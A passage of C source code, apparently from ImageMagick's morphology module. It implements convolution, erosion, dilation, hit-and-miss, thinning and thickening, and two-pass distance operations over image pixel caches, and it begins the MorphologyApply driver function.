register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
y;
ssize_t
r;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(p_view, x, -offy,1,
image->rows+kernel->height-1, exception);
q=GetCacheViewAuthenticPixels(q_view,x,0,1,result_image->rows,exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
{
status=MagickFalse;
continue;
}
p_indexes=GetCacheViewVirtualIndexQueue(p_view);
q_indexes=GetCacheViewAuthenticIndexQueue(q_view);
/* offset to origin in 'p'. while 'q' points to it directly */
r = offy;
for (y=0; y < (ssize_t) image->rows; y++)
{
register ssize_t
v;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result;
/* Copy input image to the output image for unused channels
* This removes need for 'cloning' a new image every iteration
*/
*q = p[r];
if (image->colorspace == CMYKColorspace)
q_indexes[y] = p_indexes[r];
/* Set the bias of the weighted average output */
result.red =
result.green =
result.blue =
result.opacity =
result.index = bias;
/* Weighted Average of pixels using reflected kernel
**
** NOTE for correct working of this operation for asymetrical
** kernels, the kernel needs to be applied in its reflected form.
** That is its values needs to be reversed.
*/
k = &kernel->values[ kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
if ( ((channel & SyncChannels) == 0 ) ||
(image->matte == MagickFalse) )
{ /* No 'Sync' involved.
** Convolution is simple greyscale channel operation
*/
for (v=0; v < (ssize_t) kernel->height; v++) {
if ( IsNan(*k) ) continue;
result.red += (*k)*k_pixels->red;
result.green += (*k)*k_pixels->green;
result.blue += (*k)*k_pixels->blue;
result.opacity += (*k)*k_pixels->opacity;
if ( image->colorspace == CMYKColorspace)
result.index += (*k)*(*k_indexes);
k--;
k_pixels++;
k_indexes++;
}
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
}
else
{ /* Channel 'Sync' Flag, and Alpha Channel enabled.
** Weight the color channels with Alpha Channel so that
** transparent pixels are not part of the results.
*/
MagickRealType
alpha, /* alpha weighting of colors : kernel*alpha */
gamma; /* divisor, sum of color weighting values */
gamma=0.0;
for (v=0; v < (ssize_t) kernel->height; v++) {
if ( IsNan(*k) ) continue;
alpha=(*k)*(QuantumScale*(QuantumRange-k_pixels->opacity));
gamma += alpha;
result.red += alpha*k_pixels->red;
result.green += alpha*k_pixels->green;
result.blue += alpha*k_pixels->blue;
result.opacity += (*k)*k_pixels->opacity;
if ( image->colorspace == CMYKColorspace)
result.index += alpha*(*k_indexes);
k--;
k_pixels++;
k_indexes++;
}
/* Sync'ed channels, all channels are modified */
gamma=1.0/(fabs((double) gamma) <= MagickEpsilon ? 1.0 : gamma);
q->red = ClampToQuantum(gamma*result.red);
q->green = ClampToQuantum(gamma*result.green);
q->blue = ClampToQuantum(gamma*result.blue);
q->opacity = ClampToQuantum(result.opacity);
if (image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(gamma*result.index);
}
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
p_indexes[r] != q_indexes[x] ) )
changed++; /* The pixel was changed in some way! */
p++;
q++;
} /* y */
if ( SyncCacheViewAuthenticPixels(q_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyImage)
#endif
proceed=SetImageProgress(image,MorphologyTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
} /* x */
result_image->type=image->type;
q_view=DestroyCacheView(q_view);
p_view=DestroyCacheView(p_view);
return(status ? (size_t) changed : 0);
}
/*
** Normal handling of horizontal or rectangular kernels (row by row)
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(dynamic,4) shared(progress,status)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
x;
size_t
r;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(p_view, -offx, y-offy, virt_width,
kernel->height, exception);
q=GetCacheViewAuthenticPixels(q_view,0,y,result_image->columns,1,
exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
{
status=MagickFalse;
continue;
}
p_indexes=GetCacheViewVirtualIndexQueue(p_view);
q_indexes=GetCacheViewAuthenticIndexQueue(q_view);
/* offset to origin in 'p'. while 'q' points to it directly */
r = virt_width*offy + offx;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
v;
register ssize_t
u;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result,
min,
max;
/* Copy input image to the output image for unused channels
* This removes need for 'cloning' a new image every iteration
*/
*q = p[r];
if (image->colorspace == CMYKColorspace)
q_indexes[x] = p_indexes[r];
/* Defaults */
min.red =
min.green =
min.blue =
min.opacity =
min.index = (MagickRealType) QuantumRange;
max.red =
max.green =
max.blue =
max.opacity =
max.index = (MagickRealType) 0;
/* default result is the original pixel value */
result.red = (MagickRealType) p[r].red;
result.green = (MagickRealType) p[r].green;
result.blue = (MagickRealType) p[r].blue;
result.opacity = QuantumRange - (MagickRealType) p[r].opacity;
result.index = 0.0;
if ( image->colorspace == CMYKColorspace)
result.index = (MagickRealType) p_indexes[r];
switch (method) {
case ConvolveMorphology:
/* Set the bias of the weighted average output */
result.red =
result.green =
result.blue =
result.opacity =
result.index = bias;
break;
case DilateIntensityMorphology:
case ErodeIntensityMorphology:
/* use a boolean flag indicating when first match found */
result.red = 0.0; /* result is not used otherwise */
break;
default:
break;
}
switch ( method ) {
case ConvolveMorphology:
/* Weighted Average of pixels using reflected kernel
**
** NOTE for correct working of this operation for asymetrical
** kernels, the kernel needs to be applied in its reflected form.
** That is its values needs to be reversed.
**
** Correlation is actually the same as this but without reflecting
** the kernel, and thus 'lower-level' that Convolution. However
** as Convolution is the more common method used, and it does not
** really cost us much in terms of processing to use a reflected
** kernel, so it is Convolution that is implemented.
**
** Correlation will have its kernel reflected before calling
** this function to do a Convolve.
**
** For more details of Correlation vs Convolution see
** http://www.cs.umd.edu/~djacobs/CMSC426/Convolution.pdf
*/
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
if ( ((channel & SyncChannels) == 0 ) ||
(image->matte == MagickFalse) )
{ /* No 'Sync' involved.
** Convolution is simple greyscale channel operation
*/
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
result.red += (*k)*k_pixels[u].red;
result.green += (*k)*k_pixels[u].green;
result.blue += (*k)*k_pixels[u].blue;
result.opacity += (*k)*k_pixels[u].opacity;
if ( image->colorspace == CMYKColorspace)
result.index += (*k)*k_indexes[u];
}
k_pixels += virt_width;
k_indexes += virt_width;
}
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
}
else
{ /* Channel 'Sync' Flag, and Alpha Channel enabled.
** Weight the color channels with Alpha Channel so that
** transparent pixels are not part of the results.
*/
MagickRealType
alpha, /* alpha weighting of colors : kernel*alpha */
gamma; /* divisor, sum of color weighting values */
gamma=0.0;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
alpha=(*k)*(QuantumScale*(QuantumRange-
k_pixels[u].opacity));
gamma += alpha;
result.red += alpha*k_pixels[u].red;
result.green += alpha*k_pixels[u].green;
result.blue += alpha*k_pixels[u].blue;
result.opacity += (*k)*k_pixels[u].opacity;
if ( image->colorspace == CMYKColorspace)
result.index += alpha*k_indexes[u];
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* Sync'ed channels, all channels are modified */
gamma=1.0/(fabs((double) gamma) <= MagickEpsilon ? 1.0 : gamma);
q->red = ClampToQuantum(gamma*result.red);
q->green = ClampToQuantum(gamma*result.green);
q->blue = ClampToQuantum(gamma*result.blue);
q->opacity = ClampToQuantum(result.opacity);
if (image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(gamma*result.index);
}
break;
case ErodeMorphology:
/* Minimum Value within kernel neighbourhood
**
** NOTE that the kernel is not reflected for this operation!
**
** NOTE: in normal Greyscale Morphology, the kernel value should
** be added to the real value, this is currently not done, due to
** the nature of the boolean kernels being used.
*/
k = kernel->values;
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k++) {
if ( IsNan(*k) || (*k) < 0.5 ) continue;
Minimize(min.red, (double) k_pixels[u].red);
Minimize(min.green, (double) k_pixels[u].green);
Minimize(min.blue, (double) k_pixels[u].blue);
Minimize(min.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(min.index, (double) k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
case DilateMorphology:
/* Maximum Value within kernel neighbourhood
**
** NOTE for correct working of this operation for asymetrical
** kernels, the kernel needs to be applied in its reflected form.
** That is its values needs to be reversed.
**
** NOTE: in normal Greyscale Morphology, the kernel value should
** be added to the real value, this is currently not done, due to
** the nature of the boolean kernels being used.
**
*/
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) || (*k) < 0.5 ) continue;
Maximize(max.red, (double) k_pixels[u].red);
Maximize(max.green, (double) k_pixels[u].green);
Maximize(max.blue, (double) k_pixels[u].blue);
Maximize(max.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Maximize(max.index, (double) k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
/* Minimum of Foreground Pixel minus Maxumum of Background Pixels
**
** NOTE that the kernel is not reflected for this operation,
** and consists of both foreground and background pixel
** neighbourhoods, 0.0 for background, and 1.0 for foreground
** with either Nan or 0.5 values for don't care.
**
** Note that this will never produce a meaningless negative
** result. Such results can cause Thinning/Thicken to not work
** correctly when used against a greyscale image.
*/
k = kernel->values;
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k++) {
if ( IsNan(*k) ) continue;
if ( (*k) > 0.7 )
{ /* minimim of foreground pixels */
Minimize(min.red, (double) k_pixels[u].red);
Minimize(min.green, (double) k_pixels[u].green);
Minimize(min.blue, (double) k_pixels[u].blue);
Minimize(min.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(min.index, (double) k_indexes[u]);
}
else if ( (*k) < 0.3 )
{ /* maximum of background pixels */
Maximize(max.red, (double) k_pixels[u].red);
Maximize(max.green, (double) k_pixels[u].green);
Maximize(max.blue, (double) k_pixels[u].blue);
Maximize(max.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Maximize(max.index, (double) k_indexes[u]);
}
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* Pattern Match if difference is positive */
min.red -= max.red; Maximize( min.red, 0.0 );
min.green -= max.green; Maximize( min.green, 0.0 );
min.blue -= max.blue; Maximize( min.blue, 0.0 );
min.opacity -= max.opacity; Maximize( min.opacity, 0.0 );
min.index -= max.index; Maximize( min.index, 0.0 );
break;
case ErodeIntensityMorphology:
/* Select Pixel with Minimum Intensity within kernel neighbourhood
**
** WARNING: the intensity test fails for CMYK and does not
** take into account the moderating effect of the alpha channel
** on the intensity.
**
** NOTE that the kernel is not reflected for this operation!
*/
k = kernel->values;
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k++) {
if ( IsNan(*k) || (*k) < 0.5 ) continue;
if ( result.red == 0.0 ||
PixelIntensity(&(k_pixels[u])) < PixelIntensity(q) ) {
/* copy the whole pixel - no channel selection */
*q = k_pixels[u];
if ( result.red > 0.0 ) changed++;
result.red = 1.0;
}
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
case DilateIntensityMorphology:
/* Select Pixel with Maximum Intensity within kernel neighbourhood
**
** WARNING: the intensity test fails for CMYK and does not
** take into account the moderating effect of the alpha channel
** on the intensity (yet).
**
** NOTE for correct working of this operation for asymetrical
** kernels, the kernel needs to be applied in its reflected form.
** That is its values needs to be reversed.
*/
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) || (*k) < 0.5 ) continue; /* boolean kernel */
if ( result.red == 0.0 ||
PixelIntensity(&(k_pixels[u])) > PixelIntensity(q) ) {
/* copy the whole pixel - no channel selection */
*q = k_pixels[u];
if ( result.red > 0.0 ) changed++;
result.red = 1.0;
}
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
#if 0
This code has been obsoleted by the MorphologyPrimitiveDirect() function.
However it is still (almost) correct coding for Grayscale Morphology.
That is...
GrayErode is equivelent but with kernel values subtracted from pixels
without the kernel rotation
GreyDilate is equivelent but using Maximum() instead of Minimum()
useing kernel rotation
case DistanceMorphology:
/* Add kernel Value and select the minimum value found.
** The result is a iterative distance from edge of image shape.
**
** All Distance Kernels are symetrical, but that may not always
** be the case. For example how about a distance from left edges?
** To work correctly with asymetrical kernels the reflected kernel
** needs to be applied.
*/
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
#endif
case UndefinedMorphology:
default:
break; /* Do nothing */
}
/* Final mathematics of results (combine with original image?)
**
** NOTE: Difference Morphology operators Edge* and *Hat could also
** be done here but works better with iteration as a image difference
** in the controling function (below). Thicken and Thinning however
** should be done here so thay can be iterated correctly.
*/
switch ( method ) {
case HitAndMissMorphology:
case ErodeMorphology:
result = min; /* minimum of neighbourhood */
break;
case DilateMorphology:
result = max; /* maximum of neighbourhood */
break;
case ThinningMorphology:
/* subtract pattern match from original */
result.red -= min.red;
result.green -= min.green;
result.blue -= min.blue;
result.opacity -= min.opacity;
result.index -= min.index;
break;
case ThickenMorphology:
/* Add the pattern matchs to the original */
result.red += min.red;
result.green += min.green;
result.blue += min.blue;
result.opacity += min.opacity;
result.index += min.index;
break;
default:
/* result directly calculated or assigned */
break;
}
/* Assign the resulting pixel values - Clamping Result */
switch ( method ) {
case UndefinedMorphology:
case ConvolveMorphology:
case DilateIntensityMorphology:
case ErodeIntensityMorphology:
break; /* full pixel was directly assigned - not a channel method */
default:
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(QuantumRange-result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
break;
}
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
p_indexes[r] != q_indexes[x] ) )
changed++; /* The pixel was changed in some way! */
p++;
q++;
} /* x */
if ( SyncCacheViewAuthenticPixels(q_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyImage)
#endif
proceed=SetImageProgress(image,MorphologyTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
} /* y */
q_view=DestroyCacheView(q_view);
p_view=DestroyCacheView(p_view);
return(status ? (ssize_t)changed : -1);
}
/* This is almost identical to the MorphologyPrimative() function above,
** but will apply the primitive directly to the image in two passes.
**
** That is after each row is 'Sync'ed' into the image, the next row will
** make use of those values as part of the calculation of the next row.
** It then repeats, but going in the oppisite (bottom-up) direction.
**
** Because of this 'iterative' handling this function can not make use
** of multi-threaded, parellel processing.
*/
static size_t MorphologyPrimitiveDirect(const Image *image,
const MorphologyMethod method, const ChannelType channel,
const KernelInfo *kernel,ExceptionInfo *exception)
{
CacheView
*auth_view,
*virt_view;
MagickBooleanType
status;
MagickOffsetType
progress;
ssize_t
y, offx, offy;
size_t
virt_width,
changed;
status=MagickTrue;
changed=0;
progress=0;
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
/* Some methods (including convolve) needs use a reflected kernel.
* Adjust 'origin' offsets to loop though kernel as a reflection.
*/
offx = kernel->x;
offy = kernel->y;
switch(method) {
case DistanceMorphology:
/* kernel needs to used with reflection about origin */
offx = (ssize_t) kernel->width-offx-1;
offy = (ssize_t) kernel->height-offy-1;
break;
#if 0
case ?????Morphology:
/* kernel is used as is, without reflection */
break;
#endif
default:
assert("Not a PrimativeDirect Morphology Method" != (char *) NULL);
break;
}
/* DO NOT THREAD THIS CODE! */
/* two views into same image (virtual, and actual) */
virt_view=AcquireCacheView(image);
auth_view=AcquireCacheView(image);
virt_width=image->columns+kernel->width-1;
for (y=0; y < (ssize_t) image->rows; y++)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
x;
ssize_t
r;
/* NOTE read virtual pixels, and authentic pixels, from the same image!
** we read using virtual to get virtual pixel handling, but write back
** into the same image.
**
** Only top half of kernel is processed as we do a single pass downward
** through the image iterating the distance function as we go.
*/
if (status == MagickFalse)
break;
p=GetCacheViewVirtualPixels(virt_view, -offx, y-offy, virt_width, offy+1,
exception);
q=GetCacheViewAuthenticPixels(auth_view, 0, y, image->columns, 1,
exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
status=MagickFalse;
if (status == MagickFalse)
break;
p_indexes=GetCacheViewVirtualIndexQueue(virt_view);
q_indexes=GetCacheViewAuthenticIndexQueue(auth_view);
/* offset to origin in 'p'. while 'q' points to it directly */
r = virt_width*offy + offx;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
v;
register ssize_t
u;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result;
/* Defaults */
result.red = (MagickRealType) q->red;
result.green = (MagickRealType) q->green;
result.blue = (MagickRealType) q->blue;
result.opacity = QuantumRange - (MagickRealType) q->opacity;
result.index = 0.0;
if ( image->colorspace == CMYKColorspace)
result.index = (MagickRealType) *q_indexes;
switch ( method ) {
case DistanceMorphology:
/* Add kernel Value and select the minimum value found. */
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v <= (ssize_t) offy; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* repeat with the just processed pixels of this row */
k = &kernel->values[ kernel->width*(kernel->y+1)-1 ];
k_pixels = q-offx;
k_indexes = q_indexes-offx;
for (u=0; u < (ssize_t) offx; u++, k--) {
if ( x+u-offx < 0 ) continue; /* off the edge! */
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
break;
default:
/* result directly calculated or assigned */
break;
}
/* Assign the resulting pixel values - Clamping Result */
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(QuantumRange-result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
p_indexes[r] != q_indexes[x] ) )
changed++; /* The pixel was changed in some way! */
p++; /* increment pixel buffers */
q++;
} /* x */
if ( SyncCacheViewAuthenticPixels(auth_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
if ( SetImageProgress(image,MorphologyTag,progress++,image->rows)
== MagickFalse )
status=MagickFalse;
} /* y */
/* Do the reversed pass through the image */
for (y=(ssize_t)image->rows-1; y >= 0; y--)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
x;
ssize_t
r;
if (status == MagickFalse)
break;
/* NOTE read virtual pixels, and authentic pixels, from the same image!
** we read using virtual to get virtual pixel handling, but write back
** into the same image.
**
** Only the bottom half of the kernel will be processes as we
** up the image.
*/
p=GetCacheViewVirtualPixels(virt_view, -offx, y, virt_width, kernel->y+1,
exception);
q=GetCacheViewAuthenticPixels(auth_view, 0, y, image->columns, 1,
exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
status=MagickFalse;
if (status == MagickFalse)
break;
p_indexes=GetCacheViewVirtualIndexQueue(virt_view);
q_indexes=GetCacheViewAuthenticIndexQueue(auth_view);
/* adjust positions to end of row */
p += image->columns-1;
q += image->columns-1;
/* offset to origin in 'p'. while 'q' points to it directly */
r = offx;
for (x=(ssize_t)image->columns-1; x >= 0; x--)
{
ssize_t
v;
register ssize_t
u;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result;
/* Defaults */
result.red = (MagickRealType) q->red;
result.green = (MagickRealType) q->green;
result.blue = (MagickRealType) q->blue;
result.opacity = QuantumRange - (MagickRealType) q->opacity;
result.index = 0.0;
if ( image->colorspace == CMYKColorspace)
result.index = (MagickRealType) *q_indexes;
switch ( method ) {
case DistanceMorphology:
/* Add kernel Value and select the minimum value found. */
k = &kernel->values[ kernel->width*(kernel->y+1)-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=offy; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* repeat with the just processed pixels of this row */
k = &kernel->values[ kernel->width*(kernel->y)+kernel->x-1 ];
k_pixels = q-offx;
k_indexes = q_indexes-offx;
for (u=offx+1; u < (ssize_t) kernel->width; u++, k--) {
if ( (size_t)(x+u-offx) >= image->columns ) continue;
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
break;
default:
/* result directly calculated or assigned */
break;
}
/* Assign the resulting pixel values - Clamping Result */
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(QuantumRange-result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
p_indexes[r] != q_indexes[x] ) )
changed++; /* The pixel was changed in some way! */
p--; /* go backward through pixel buffers */
q--;
} /* x */
if ( SyncCacheViewAuthenticPixels(auth_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
if ( SetImageProgress(image,MorphologyTag,progress++,image->rows)
== MagickFalse )
status=MagickFalse;
} /* y */
auth_view=DestroyCacheView(auth_view);
virt_view=DestroyCacheView(virt_view);
return(status ? (ssize_t)changed : -1);
}
/* Apply a Morphology by calling theabove low level primitive application
** functions. This function handles any iteration loops, composition or
** re-iteration of results, and compound morphology methods that is based
** on multiple low-level (staged) morphology methods.
**
** Basically this provides the complex grue between the requested morphology
** method and raw low-level implementation (above).
*/
MagickExport Image *MorphologyApply(const Image *image, const ChannelType
channel,const MorphologyMethod method, const ssize_t iterations,
const KernelInfo *kernel, const CompositeOperator compose,
const double bias, ExceptionInfo *exception)
{
CompositeOperator
curr_compose;
Image
*curr_image, /* Image we are working with or iterating */
*work_image, /* secondary image for primitive iteration */
*save_image, /* saved image - for 'edge' method only */
*rslt_image; /* resultant image - after multi-kernel handling */
KernelInfo
*reflected_kernel, /* A reflected copy of the kernel (if needed) */
*norm_kernel, /* the current normal un-reflected kernel */
*rflt_kernel, /* the current reflected kernel (if needed) */
*this_kernel; /* the kernel being applied */
MorphologyMethod
primitive; /* the current morphology primitive being applied */
CompositeOperator
rslt_compose; /* multi-kernel compose method for results to use */
MagickBooleanType
verbose; /* verbose output of results */
size_t
method_loop, /* Loop 1: number of compound method iterations (norm 1) */
method_limit, /* maximum number of compound method iterations */
kernel_number, /* Loop 2: the kernel number being applied */
stage_loop, /* Loop 3: primitive loop for compound morphology */
stage_limit, /* how many primitives are in this compound */
kernel_loop, /* Loop 4: iterate the kernel over image */
kernel_limit, /* number of times to iterate kernel */
count, /* total count of primitive steps applied */
kernel_changed, /* total count of changed using iterated kernel */
method_changed; /* total count of changed over method iteration */
ssize_t
changed; /* number pixels changed by last primitive operation */
char
v_info[80];
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
count = 0; /* number of low-level morphology primitives performed */
if ( iterations == 0 )
return((Image *)NULL); /* null operation - nothing to do! */
kernel_limit = (size_t) iterations;
if ( iterations < 0 ) /* negative interations = infinite (well alomst) */
kernel_limit = image->columns > image->rows ? image->columns : image->rows;
verbose = IsMagickTrue(GetImageArtifact(image,"verbose"));
/* initialise for cleanup */
curr_image = (Image *) image;
curr_compose = image->compose;
work_image = save_image = rslt_image = (Image *) NULL;
reflected_kernel = (KernelInfo *) NULL;
/* Initialize specific methods
* + which loop should use the given iteratations
* + how many primitives make up the compound morphology
* + multi-kernel compose method to use (by default)
*/
method_limit = 1; /* just do method once, unless otherwise set */
stage_limit = 1; /* assume method is not a compound */
rslt_compose = compose; /* and we are composing multi-kernels as given */
switch( method ) {
case SmoothMorphology: /* 4 primitive compound morphology */
